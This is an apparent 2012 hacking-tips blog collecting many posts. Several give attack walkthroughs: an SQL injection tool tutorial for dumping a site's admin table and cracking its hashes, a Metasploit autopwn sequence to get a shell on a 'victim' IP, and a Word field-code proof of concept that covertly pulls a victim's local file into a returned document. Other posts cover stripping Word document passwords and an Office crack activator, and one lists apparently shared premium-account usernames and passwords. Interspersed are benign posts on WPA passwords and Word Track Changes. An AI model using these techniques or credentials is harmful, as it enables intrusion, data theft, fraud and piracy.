Tuesday, July 31, 2012

A New Hack FRO Auctions in EBAY


Just found this on the net, so I gave it a try.


it actually works.

Very handy if you are an Ebayer.

Enjoy

When you look at an item and click on bid history all the bid amount are replaced

with "-" until the end of the auction.

To view these amounts before the auction ends when viewing the item change


in the address bar to


And then click on the bid history. The bid amounts will be shown.

Now enjoy.

SQLI Helper Tutorial - A Must Read Article

Today I am going to show you people how to use SQLi Helper to Hack a Website. The SQLi Helper is a tool used to do all the work automatically which a Hacker would have to do manually. That make it a very popular tool among script-Kiddies as well as Pros.


You can download the SQLi Helper from Here.
It should look this this:

Now the First Step is to give the Target site like http://targethost.com/expoit.php?id=1 (Note: This is not the real site). After you give  the target site click on the Inject button.


And then click on the Get Database Button.

Now the following Information will be available about the Host:



Now to take the attack forward choose a Database from the Database Name column and click on the Get Table button.


Now we Have the names of the Tables. Now we need to know the Columns of the Tables which contain sensitive information. For that we will choose the Table admininfo to get columns.

To get Columns select the Table and click on the Get Column Button.

Now we have the Names of the Columns shown below:

Now select the one which seems important and click on the Dump Now Button.
And then a New Windows will open that will Dump the Data that is in those Columns. Like Show Below:


After we have got this Sensitive Information, we can use online MD5 cracker to crack the Password Hash and access the Website with Administrative Privilege.

3 Ways To Choose A WPA Key That’s Difficult To Hack

Wi-Fi is a great way to stay connected to the Internet all over your home without huge wires, and is the only way many devices like the IPad have access to the Internet. Too often users compromise security for convenience and either leave their network open or choose an easy password. Here are three tips to choosing a secure WPA key for your home WI FI Network.

1. Avoid Dictionary Words

Most Wi-Fi hackers get in with a brute force attack. A brute force attack tries random commonly used words and phrases together over and over until it finds the password. If you use simple dictionary words to secure your Wi-Fi than it isn’t a Question of if a hacker can get in but rather when.

2. Use Random Capitalization

Since most things are case sensitive getting into the habit of a capitalization pattern goes a long way to creating an unhackable network key. For example, On AnD oFf capitalization is one way to almost guarantee they wont be able to gain access without permission.

3. Double Up Numbers

Using numbers and letters is another great basic tip but a truly random string of numbers is hard to remember but using something like a birthday leaves you vulnerable to anyone who knows personal info about you. One happy medium is to double or triple up numbers. For example, if your birthday is 12/10/1980 than instead of using 12101980 as part of the password use 1212101019801980 it will be far harder to guess and super easy to remember.


How to hack a computer with Nmap and Metasploit


I have written different hacking articles about Nmap and Metasploit. Now I am writing this article to teach how to hack a computer using these two great tools.


Just got Here and download the Latest Framework.


Now open the metasploit console. And type the following commands:


1: db_create (this will create database needed for this attack)

2: TYPE nmap -sT –sV XXX.XXX.XXX.XXX( X be the IP address of victim)

Now give it time to scan and when it is complete type following command.

3: db_autopwn -p -t –e


This would start the penetration test and great thing about this is that it does not need any manual configuration. Every thing will be done automatically and if the test is successful a shell will be created.

10 Best Yahoo! Messenger Tricks and Hacks


Yahoo! Messenger is an instant messaging program which is compatible with all Windows versions. While instant messaging is the focus of Yahoo! Messenger, there are several special tricks that can enhance the user experience.





Here are my 10 Best Yahoo! Messenger Tricks and Hacks:

1. Find invisible users on your Yahoo! Messenger list

Want to find out someone who’s hiding from you? You can easily do so by going to Yahoo! Invisible Checker. All you need to do is type in the Yahoo! ID and the particular users status will be revealed.

2. Invisible nickname on chat rooms

Just go to edit profile and in the nick name type a (space character) on it just press Alt 0160 ( or ALT+255 ) and save it.

Now go to any Yahoo! chat room and you’ll notice that your nick name is empty. [Alt+0160 is a keyboard shortcut for space]

3. Run Multiple Instances of Yahoo! Messenger on same system

Some of you might be having more than one Yahoo! ID would like to log in simultaneously. Here is an easy way to do it without installing any sort of software. You just have to edit the registry and voila there you go. Follow the instructions below:



  • Download the following -multiyahoo.reg and save it to your hard disk.

  • Double click on it.




  • The above dialog will popup, click ‘Yes

  • Start the yahoo messenger login with your first ID. Then again start another yahoo messenger by clicking on the messenger icon and log in with your second ID.This tweak works with all versions of Yahoo Messengers.


4. Removing Ads from your Yahoo! Messenger

If you are using Yahoo! Messenger 8.0, then you can disable ads by following the below steps:


  • First close the Yahoo! Messenger.

  • Save this .bat file and execute it. (Note: You won’t be able to enter the chat rooms if you use this patch.)

The above fix doesn’t work for Yahoo! Messenger 9 Beta. Here’s a way to disable the ads in Yahoo! Messenger 9:


  • Make sure the Yahoo! Messenger isn’t running, if it is then just close it.

  • Now backup the following file C:\Program Files\Yahoo!\Messenger\Yahoo!Messenger.exe (create a new copy)

  • Download HxD hex editor.

  • Open C:\Program Files\Yahoo!\Messenger\Yahoo!Messenger.exe in the hex editor

  • Now go to the offset 295928 (in HxD: Search/GoTo)

  • Look at the right column and replace y from “y.m.s.g.r.a.d.s” with p

  • Save the file and close HxD.
Note: This approach breaks Yahoo! Messenger’s terms of service.

If nothing works try launching this file.

5. Yahoo! Smiley Codes

You can make use of all smileys including hidden ones in your messenger by using YEmotePLUS plugin.

6. Creating Custom Profiles for Chat

You can create custom profiles with different name, sex and other details from Yahoo! Create/Edit Profiles. You can use these for chat services only.

7. Change the Yahoo! Messenger Title Bar

You can change the text that appears at the very top of the Yahoo! messenger window by editing the ymsgr.ini file.

1. Go to Program Files\Yahoo!\ and open ymsgr.ini.

2. Then at the end, type this:

[APP TITLE]
caption=YOUR TEXT

3. Change YOUR TEXT to whatever you want it to say. Then save the file and close messenger. When you restart messenger you will see your new message.

8. Online Status Changer and Manager

HyperIM is currently the best status changer & manager for Yahoo! messenger available at present.

9. Access Yahoo! Messenger Chat archives while offline

You can access your Yahoo! chat logs using Yahoo! Message Archive Decoder. It reads Yahoo! Messenger archive files (.dat files) and presents them in a format that you can read. It decodes the message archive without logging in (offline mode and no passwords required).

10. Retrieve Yahoo! Messenger Display pictures

Y! Display Pic will retrieve Yahoo! users even if they are offline or invisible.

How To Find Hidden Web Pages - URL Cracking


URL cracking is a useful technique that anyone can apply but is often overlooked by web surfers content to trust the information they see on the page in front of them. URL cracking is a technique in which a searcher pre-empts, alters and guesses URL's that are likely to appear within a site in order to turn up hidden or ostensibly inaccessible pages.


As an example of how this technique can work let's assume you have reached the front page of a site that covers a topic you are interested in but all the page says is:



"Welcome to John's Computer Site.
This site is under construction, please check back soon".

Not very helpful and there are no links on the page.

The 'under construction' part serves as a clue. It means that it is likely that John has already prepared some pages for his site. Maybe he's uploaded them already but hasn't put any links on the front page yet.

With a little URL cracking you may be able to find any pages John has put on his site already.

Here's how:

Let's say John's Computer Site front page has the (fictional) URL:
http://www.somewhere.com/on/jsmith/index.html

What if we replaced the index.html part of the URL with another page name, maybe computers.html or pc.html, etc. you can continue doing this until you find something, get bored or are satisfied that there is nothing there. This is not an exact science but can turn up some tasty treats given the right circumstances.

One of the best ways to try URL cracking is where a number appears as part of the name of the name of a Web page, for example if you visit a page called:
http://www.somewhere.com/on/jsmith/gallery05.html

It is a relatively safe bet that there are at least 4 other 'gallery' pages (gallery01.html, gallery02.html, gallery03.html and gallery04.html) and possibly more.
URL Cracking, although not well recognised or used can be a useful weapon in the searcher's arsenal and you may just stumble on that hidden gem using this technique. On the down side it can be time consuming and frustrating, the best plan of action is to use URL cracking after other your primary search techniques have failed. It might just turn up what you've been looking for.

Monday, July 30, 2012

How To Send a Self Deleting SMS

Basically this technique is called SAFE-TEXT. It's a technique where a message destroys itself after being read. If you want to call it the Data-centric Suicide Message, that's fine too. This is a website that allows you to send such type of sms for free of cost after registering on it. But it has limitation that you can send only 10 SMS a day.

So here's the thing. With Wikileaks on one side and British libel law on the other, there's room for a tool that lets you say what needs to be said, but without it falling into the wrong hands in the process.

What it does is allow you to send an expletive-laden opinion of your boss to a co-worker, or an it's-in-the-public's-interest-to-know-this leak to your friend on the Guardian (or Wired), without it having a chance to be read by said boss, or unsaid MP.

Note: This trick should only work for British mobile network operators.

Here’s how to use it:
1. To register and activate, text WIRED to 83118 (charged at your standard network rate). You’ll   be able to send up to 10 messages daily.
2. If you’re the sender, the message will show your name and number.
    Write your libel-ridden hate speech and hit send.
3.The receiver will then be sent a text telling them they have been sent a Wired Safe Text with a link to the mobile internet site that hosts your message.
4. When they click through they will activate Safe Text. They will only have a few seconds to read the text (so don’t make it too long) before it self-destructs.

Free Premium Accounts for 13 Download Sites - Download Music, Movies, Games, Software and Much More

Best Download Sites - Get full version Games, Applications, Movies, MP3s, TV Shows, eBooks, Software, Security/Hacking Tools...
In this article i will share a list of usernames and passwords of the premium accounts for Best download sites. All of the accounts are working 100%.
Here is the list:
1. www.butterflydownloadnetwork.com (Download Movies, Music, PC Games, Shows)

Username : cinemanetwork20
Password : butterfly20


2. www.downloadprofessional.com (Software, Movies, Music, TV Shows, Full version games)

Username : lo886Ees
Password : zAgt88er

3. www.divxcrawler.com (Direct Download Movies, Software and Music Videos)

Username : divx273
Password : 8342729


4. www.sharingzone.net (Games, Software, Movies, TV shows, Music and more)

Username : LODMQYHX
Password : 375021402
Receipt : 4T5W89RD


5. www.watchdirect.tv (Reality TV Shows, Comedy, Old Television Shows, Latest Headlines, Action/Adventure)

Username : cinemanetwork20
Password : butterfly20


6. www.unlimitedgamedownloads.com (Download all the latest Games, PSP Softwares...)

Username : ga20me
Password : ke01feb


7. www.fullreleasez.com (Full version games, software, movies, music, tv shows...)
Username : Af872HskL
Password : XjsdH28N


8. www.fulldownloads.us (Everything you need)

Username : Af872HskL
Password : XjsdH28N


9. www.pirateaccess.com (Applications, Games, Movies, MP3s, TV, eBooks, Security/Hacking, Rapidshare)

Username : yourfrienddalat@gmail.com
Password : CHh5LKPI

Username : xxx_heel_xxx@yahoo.com
Password : MJY0BUY

Username : i_l0ve_u_786@yahoo.com
Password : rYvLgPrt

Username : mubashar_siddique@yahoo.com
Password : F9Gzgwb5


10. www.alphaload.com (Signing up with iLoad comes with a great service, fair prices and an awesome software, which are offered for free for all customers)

Username : AL3429352
Password : ykbcKTNS

Username : AL3429355
Password : RCHAbhKM

Username : AL3429350
Password : gMZNFcyS

Username : AL3429351
Password : cTAkWAxc

Username : AL3429352
Password : ykbcKTNS


11. www.gamedownloadnow.com (Unlimited Game Downloads)

Username : ga20me
Password : ke01feb


12. www.unlimiteddownloadcenter.com (Download Music, Movies & Games)

Username : cu20me
Password : ke01feb


13. www.tvadvanced.com (Online TV, Movies, Music, Games...)

Username : mv03dl
Password : frmvdl

Trojan Virus attacks: An analysis

What is a Trojan virus?

A virus that looks like a harmless and useful program but actually contains a code that can destroy data or install adware or spyware on your computer. Trojan viruses can be embedded in email attachments, programs that have been downloaded, or even through operating system vulnerabilities on your computer.

A recent tactic that hackers are using is to put the virus in pictures. Never download anything you do not recognize. Unlike the regular computer viruses Trojans do not replicate.

What does a Trojan virus do to your computer?

Trojan viruses can do much damage to your computer or worse, hackers can read the files and personal information from your computer and steal your identity. They can also add unwanted spyware and ad ware, deliver unsolicited pop-ups and advertising, all without your consent.

So how can get rid of them?

Most if not all antivirus programs will detect and remove Trojans, viruses and other unwanted programs from your computer automatically. For e-mail attachments, you may have to scan them individually. There are programs you can download that will do it automatically. There is plenty of anti-virus software free and paid out there that can look at. Payment programs usually have more features that can be used as a registry cleaner.

Whatever your choice may be, make sure you have installed the latest version, periodically perform system analysis, and updated with the latest version to keep your computer protected.

One of the most evil and insidious things ever invented was the Trojan virus. What person with dementia thought of this is beyond comprehension. Trojan virus infiltrates your entire computer system and affects its ability to quickly browse the Internet and in the worst cases can cause the entire system to crash, permanently delete data stored on your hard drive.

There are some steps you can take to the removal of Trojan viruses, to save all your data and installed software. If you take your computer to a repair shop or the Geek Squad you want to delete the entire hard drive after saving valuable documents. After going to reinstall the operating system software and make your computer virus free.

The problem with this method is that it is expensive, time consuming, and you can never recover the installed applications. Unless you have the original application software installation discs and registration number to go with it, you have to buy new programs. That can reach hundreds and even thousands of dollars if you have a lot of expensive programs installed as Photoshop, Dreamweaver, InDesign, ProSeries, and many others.

You can also simply download a virus cleaner and run it. That will solve more problems and run the Trojan virus removal desired. If your computer crashes or can not connect to the Internet, which happens a lot with Trojan virus infections.

Sunday, July 29, 2012

Send Free Unlimited SMS to Any Country

How to Send Free Unlimited SMS to Any Country ?



Hi all users as all the describes the story that by using this site you can send unlimited SMS to any number to any country throughout the world. This site has four SMS servers and the good thing is that you can use them totally free of cost and of course without any registrations. So lets get started.


Click here to got to the link





Enjoy.......

Crack Activator Microsoft Office 2010 Plus

Crack Activator Microsoft Office 2010 Plus | 5.02 Mb



The Version Of Office 2010 That Supports The Activator:

Microsoft Office Professional Plus 2010 32-Bit/64-Bit (Version Retail And VL)
Microsoft Visio Professional 2010 32-Bit/64-Bit (Version Retail And VL)
Microsoft Project Professional 2010 32-Bit/64-Bit (Version Retail And VL)

Activation-Feautures:

Fully Automated Activation Process.
Automatic Notification Appears If UAC In Windows 7,Not Vista Or Windows
Server 2008 Off.At The Same Time After Clicking Yes Will Turn Off And Restart
Activation Duration Is 180 Days.Then Run It Again And It Works Without Problems.

Usage:

- Turn Off UAC,And Firewall.
- First Run The Activator With Admin Rights And Than Activate It.

Appearance Dialog Box Asking You Are You Sure That Your Running With Admin Rights.
Than Click Yes Confirm It With Yes,If You Do Not Disable The UAC Dialog Will Appear
Asking You Click Yes At The Same Time Automatically Than Restart The Computer.
After You Restart The Computer To Return The Activation Conduct As Step 2
You Can Not Read This Section If The Machine Is Switched Off UAC)
Activation Process Will Run Automatically But You Should Note The Steps
It Will Bow Out Information On Active Readers Immediately See If The Line
Is What Is License Licensed Status Means OK Also Other Letters Is Not.
If Your Computer Has Installed The Third Set Of Microsoft Office Professional Plus 2010,
Microsoft Visio 2010 Professional,Microsoft Project 2010 Professional,
Then Please Note That Three Lines Of License Status Fraud See Which
Were Activated And Which Is Not Activated.

Note:

This Step Should Only Do If You Are Using Windows 64-Bit And If You Have
Office 2010 Retail 64-Bit Installed On Your System.For The Rest You Have To Do This Step.
After Completion Of All Activated (License Licensed Status In Most States),
Then You Proceed To Load The Registry Files In The File
Name Is (fix64bit.reg) Than Open The Software Up And Check The Status Of Activation.



Download Crack Activator Microsoft Office 2010 Plus




Download Microsoft Office 2010 Plus Trial 
(Direct Download)

Free Download Microsoft's Office 15


Microsoft is currently testing a Technical Preview version of Office 15, its next-generation Office productivity suite. A small number of third-party partners, OEMs, and businesses have access to the code, but Microsoft is staying mum on the exact features of its next release. We previously took a closer look at Office 15 with detailed screenshots of its new Metro inspired interface, showing off the clean and simple look for the future of Office. Today we are able to share details on a number of new and improved features in each of the core applications for Office 15, thanks to several people with access to the early Technical Preview code. From Touch and Reading Mode to a Weather Bar feature in Outlook 15, we have exclusive details on Microsoft’s plans — read on to find out more.



Microsoft Excel 2007 : 10 techniques


Request your free e-Book: Excel 2007, 10 Techniques Pos Know


  • Written by professionals working actively in the I.T. industry, this short e-book on ms excel reveals 10 techniques which pros use everyday.

  • This short e-book on ms excel is written in an easy to read style with real examples for you to practice along.

  • You are bound to lift your confidence in under 25 pages of reading. Request your copy to begin learning ms excel toady.

  • Click here to request your FREE copy

Get Microsoft chat support to contact Microsoft Office

Microsoft Office is an Office suite of inter related computer applications like Microsoft Word, Outlook, Excel and PowerPoint, servers and services for Windows operating systems and also certain other operating systems like Mac OS X. Microsoft Office products are so popular among the users and is very useful package providing amazing features to general users for use in office and home. As such it is seen that many issues are being faced by people with this application and the troubleshooting tricks are also widely available.

One such easy way to get assistance on the Microsoft Office suite of products is by contacting Microsoft Office, which will provide you with plenty of information and help on all the Office programs. For any support services for the programs, you can always rely on the Microsoft Office Online service, but in case you can’t find what you need there, the website also has an option to provide details for contacting Microsoft Office. You can submit your doubts or questions and other issues on this site and get instant Microsoft chat responses online or by mail or phone.

Microsoft chat support instructions for contacting Microsoft Office


  • Go to Microsoft Office’s Contact Us website and choose the option that best suits your purpose or requirement for contacting Microsoft office. Clicking the Support for Microsoft Office Products link would be likely the best option for you.

  • Click on the program or suite that you have doubts with.

  • Also run a search through the “Hot topics” listed on the next page. This might contain the popular issues that are frequently encountered by users and might help resolving your issue.

  • On the upper right corner, click on the question mark icon to contact a support professional.

  • You will have to answer some simple questions that appear on the next pages to help you with your issue. Click “Next”.

  • You can select any one of three options for contacting Microsoft Office: via email, telephone or online. You can get the details about each of these options in the same page. Click the links to send requests via email or online or use the telephone number listed there to place a call. Microsoft chat support team reminds you that you might be charged for calling these numbers.

That’s how you contact Microsoft Office for their support on the MS Office products.

Microsoft Office Hacks


This article is just to make u aware of knowm existing threats only for educational purpose.

I have stumbled onto a couple potential security issue in Microsoft Word blogs i would like to share. In both cases the adversary (mis)uses fields to perpetrate the attack. It's important to note that fields are not macros and, as far as I know, cannot be disabled by the user. I am providing a basic description along with a proof-of-concept demo. I am fairly certain that someone with free time and imagination can expand on these principles, possibly applying them to other products.

Following tradition I'll use Hacker and Victim as the two parties involved.Hacker will be the adversary.

1) Document collaboration spyware.

Attack Basics: Hacker sends Victim a Word document for revisions. After Victim edits, saves, and mails it back to Hacker the file will also include contents of another file(s) from Victim's computer that Hacker has specified a priori. To achieve this, Hacker embeds the INCLUDETEXT field into the document. The field results in inclusion of a specified file into the current document. Of course, Hacker must be careful include it in such a way that it does not become apparent to Victim. Hacker can do all the usual things like hidden text, small white font, etc. Alternatively (and in my opinion cleaner, she can embed the INCLUDETEXT field within a dummy IF field that always returns an empty string. In this case, the only way Victim can notice the included file is if he goes browsing through field codes.



Attack Improvements: The disadvantage of the basic attack is that Hacker must rely on Victim to update the INCLUDETEXT field to import the file. If the document is large and contains tables of contents, figures, etc.

then Victim is very likely to update all the fields. However, Hacker would like to make sure that the field gets updated regardless of whether Victim does it manually or not. Automatic updates can be forced if a DATE field is embedded into the INCLUDETEXT and it is the last date field in the document (don't ask me why).



Proof of concept: Inserting the following field structure into the footer of the last page will steal the contents of c:a.txt on the target's computer. Keep in mind the plain curly braces below must actually be replaced with Word field braces (you can either use the menus to insert fields one by one, or ask google how to do it by hand).


{ IF { INCLUDETEXT { IF { DATE } = { DATE } "c:\a.txt" "c:\a.txt" } * MERGEFORMAT } = "" "" * MERGEFORMAT }
Countermeasures: The only thing you can do now is decide how paranoid you want to be. If you must edit and send out a Word file with unknown origins, you may want to manually go through the fields. It would be nice to be able to force user confirmation (via a dialog box) for all includes. Alternatively one could write a scanner. Of course an optional standalone checker will never be used by those most at risk.

2) Oblivious signing

Attack Basics: Hacker and Victim wants to sign a contract saying that Hacker will pay Victim $100. Hacker types it up as a Word document and both digitally sign it. In a few days Victim comes to Hacker to collect his
money. To his surprise, Hacker presents him with a Word document that states he owes her $100. Hacker also has a valid signature from Victim for the new document. In fact, it is the exact same signature as for the contract Victim remembers signing and, to Victim's great amazement, the two Word documents are actually identical in hex. What Hacker did was insert an IF field that branched on an external input such as date or filename. Thus even though the sign contents remained the same, the displayed contents changed because they were partially dependent on unsigned inputs. The basic point is that very few users know the actual contents of their Word documents and it should be obvious that one should never sign what one cannot read. Of course, Victim could contest the contract in court. An expert witness (that's actually an expert) could easily demonstrate that there are unsigned inputs and therefore it is not clear which version was actually signed. Thus Victim can get out of the fraudulent contract. However, the same logic will hold for Hacker and she gets away without paying Victim $100 she signed for. Thus, an adversary can build in a free escape clause. Note that I am just speculating about all the legal aspects.

Proof of concept: Inserting the following field structure at the tail of the document will cause "Hello" to be displayed if the filename is "a.doc" and "Bye" otherwise.

{ IF { FILENAME * MERGEFORMAT { DATE } } = "a.doc" "Hello" "Bye" * MERGEFORMAT }

Update : this flaw has been fixed in office 2003 onwards but still works in office 2000 and even sometimes in 2002/03

We can consistently crash Word 2000 using the following method:

1) Open up any text/document editor such as notepad or wordpad
2) type a single word (must be a known word, no punctuation).
3) highlight the whole word and CTRL+C
4) launch word 2000
5) CTRL+V
6) press HOME to take you to the start of the line
7) type I
8) hit the space bar

This consistenly crashes Word 2000 with the following error message:

DDE Server Window: WINWORD.EXE - Application Error The instruction at "0x3076a63e" referenced memory at "0x00000000". The memory could not be "read".

Vulnerability:
remove office passwords
Vulnerable:

MS Word (Win2K/XP)

Example 1

1) Open MS Word with a new/blank page

2) Now select "Insert" >> "File" >> browse for your password protected doc & select "Insert" & "Insert" password protected doc into your new/blank doc

3) Now select "Tools" & Whey hey, voila, there's no longer an "Unprotect document" ... password vanished ...

Example 2

1) open your password protected doc in MS Word i.e. you can't edit protected fields (apparently)

2) Save as a Rich Text Format (RTF) & keep this RTF file open in MS Word (YES, keep open)

3) Whilst your new RTF file is open in MS Word, go "File open" & find your newly saved RTF file & open (YES, you DO need to do 'tis even though you already have it open)

4) If prompted to revert say YES, if not prompted stay calm. Now in your MS Word menu go & "Unprotect document", amazingly, voila, you don't get prompted for a password

Change password if ya like & or save in whatever format if ya like ...

Saturday, July 28, 2012

Track changes in Microsoft Word 2010


How to accept Track changes in Microsoft Word 2010?


"Track changes" is wonderful and remarkable tool of Microsoft Word 2010. The feature allows editing your documents without making the changes permanent. It means if you have deleted a word, Track back highlights it, though the word is deleted but until final changes are accepted, it remains there.
A track change is very helpful when you are working on draft that needs extra care. For Example you are working your project and you are not sure whether changes you made are right and you want to take your professors/superiors opinion.


Today the world has become global village, now virtual teams sitting in different parts of world are working on same projects. They need to communicate, they suggest prose and finalize things, track changes help them to make changes or send suggestions to other members.

One can delete, add, comment or make formatting changes by using it.

Instructions

1- Open desired word document you wish to apply track changes.



2.      2- Go to Review Tab, under "Tracking" Group, click on track changes. It will change to orange colour, that means feature has "turned on" 


     


3.       Take the cursor to where you want to save changes and type, you will see colour of the text will different. It means that changes you are making are not permanent.  

     

4.       Go to "Tracking Group" and click on "Show Markup", choose "Balloons" and Click on your desired settings how you want to show your changes. Either you want to show your changes/Revisions in Balloons, with in your document or show only comments and Formatting in Balloons. 

     

5.       Go to "Comments" Group, under Review tab, click "New comment" where you want to insert a comment, leave a note or ask question.  

     

6.       Go to the Review Group, click on the Reviewing pane and choose either vertical or horizontal settings to carefully go through your document. OR go through them one by one by choosing "Next" or "Previous" from "Changes" Group.

       

7.       Click on "Accept or Reject" from "Changes Group" to tell programme whether you want to keep or permanently delete a change.  

     
Go to the "File Menu" and "Save" all changes that you made in your document.

ShareThis

Related Posts Plugin for WordPress, Blogger...

 
Design by Wordpress Theme | Bloggerized by Free Blogger Templates | coupon codes